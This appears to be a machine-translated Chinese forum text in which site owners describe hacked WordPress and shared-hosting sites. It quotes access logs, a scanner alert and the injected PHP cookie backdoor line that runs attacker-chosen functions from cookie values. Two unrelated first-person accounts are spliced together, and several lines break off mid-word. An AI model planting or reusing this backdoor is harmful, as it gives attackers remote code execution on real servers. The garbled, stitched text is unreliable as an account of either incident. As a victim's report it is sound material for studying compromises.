我有两个网站看起来被黑了。我检查了访问日志并找到了以下日志条目:
"GET / HTTP/1.1" 200 20213 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0"
"GET /index.php?cperpage=1 HTTP/1.1" 301 0 "http://example.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10
最近,其中一个WP网站文件删除了"CXS扫描器“,并检测到根文件夹中的所有文件为
index.php' Known exploit = [Fingerprint Match] [PHP COOKIE Exploit [P1036]]
当我将检测到的cookie漏洞文件与旧版本进行比较时,我注意到该文件中添加了额外的代码行:
检测到的index.php
<?php
if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);
/**
* Front to t
有时,我的共享主机环境会受到影响,因为,嗯,我未能保持我安装的应用程序组合的补丁。上周,这是因为一个名为Help Center Live的PHP应用程序安装了一个旧的和未使用的应用程序。其结果是,服务器上的每个PHP文件(我有几个Wordpresses,Joomlas,SilverStripe安装)都添加了代码,从其他站点拉出遮盖的链接,并将它们包含在我的页面中。其他人报告说,在这种攻击之后,他们的网站被谷歌屏蔽了-幸运的是,我似乎很早就发现了这一点。只有当我从手机浏览其中一个网站时,我才注意到这一点--该页面的链接包含在移动浏览器上。
我在日志中发现了许多像这样的攻击尝试:
62.149.1